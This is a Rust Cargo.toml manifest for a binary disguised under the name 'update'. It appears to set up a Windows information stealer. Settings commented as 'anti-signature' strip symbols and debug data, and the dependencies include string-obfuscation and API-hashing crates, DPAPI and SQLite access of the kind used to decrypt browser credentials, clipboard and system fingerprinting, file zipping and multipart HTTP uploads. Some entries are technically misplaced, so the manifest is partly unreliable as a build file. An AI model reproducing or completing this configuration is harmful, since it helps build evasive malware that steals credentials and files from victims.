[package]
name = "update"
version = "0.1.0"
edition = "2024"

[features]
test_api_hash = []

[profile.release]
opt-level = "z"              # Maximum size optimization
lto = "fat"                  # Full link-time optimization
codegen-units = 1            # Single codegen unit for maximum optimization
panic = "abort"              # Remove panic unwinding (reduces size)
debug = false                # No debug info
debug-assertions = false     # No debug assertions
overflow-checks = false      # No overflow checks (smaller binary)
strip = "symbols"            # Strip ALL symbols and debug info
rpath = false                # No runtime library search paths
incremental = false          # Disable incremental compilation
split-debuginfo = "off"      # No debug info splitting

# Additional anti-signature settings
[build]
rustflags = [
    "-C", "link-arg=/EMITPOGOPHASEINFO",  # Randomize code layout
    "-C", "link-arg=/DEBUG:NONE",          # No PDB files
    "-C", "link-arg=/PDBALTPATH:none",     # No PDB path
]

[profile.release.build-override]
opt-level = "z"
codegen-units = 1
# Ultra aggressive size reduction
[profile.release.package."*"]
opt-level = "z"
strip = "symbols"

[dependencies]
api-hash-macro = { path = "api-hash-macro" }
aes-gcm = "0.10"
obfstr = "0.4"
litcrypt = "0.4"
rand = "0.8"
base64 = "0.21"
proc-macro2 = "1.0"
quote = "1.0"
syn = { version = "2.0", features = ["full"] }
rusqlite = { version = "0.31", features = ["bundled"] }
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
dirs = "5.0"
winapi = { version = "0.3", features = ["dpapi", "wincrypt", "winbase", "winnt", "winreg", "errhandlingapi", "processthreadsapi", "memoryapi", "handleapi", "tlhelp32", "fileapi", "minwinbase", "winerror", "namedpipeapi", "wtypes", "combaseapi", "objbase", "oleauto", "unknwnbase", "wtypesbase", "wincon", "consoleapi", "winuser", "setupapi", "cfgmgr32", "sysinfoapi", "iphlpapi", "ws2def", "iptypes", "psapi", "debugapi", "wingdi", "wow64apiset", "securitybaseapi", "synchapi", "winsock2", "netioapi"] }
regex = "1.10"
windows = { version = "0.52", features = ["Win32_System_Registry", "Win32_System_SystemInformation", "Win32_NetworkManagement_IpHelper", "Win32_System_Performance", "Win32_Foundation", "Win32_Security", "Win32_UI_WindowsAndMessaging", "Win32_Security_Cryptography", "Win32_System_Memory", "Win32_System_Threading", "Win32_Graphics_Gdi", "Win32_Networking_WinSock", "Win32_NetworkManagement_Ndis", "ApplicationModel_DataTransfer", "Foundation", "Foundation_Collections"] }
wmi = "0.13"
chacha20 = "0.9"
walkdir = "2.3"
zip = "0.6"
reqwest = { version = "0.11", features = ["json", "multipart"] }
tokio = { version = "1.0", features = ["full"] }
sha2 = "0.10"
lazy_static = "1.4"
sysinfo = "0.30"
winreg = "0.52"
flate2 = "1.0"
uuid = { version = "1.0", features = ["v4"] }

[lib]
proc-macro = true

[[bin]]
name = "update"
path = "src/main.rs"
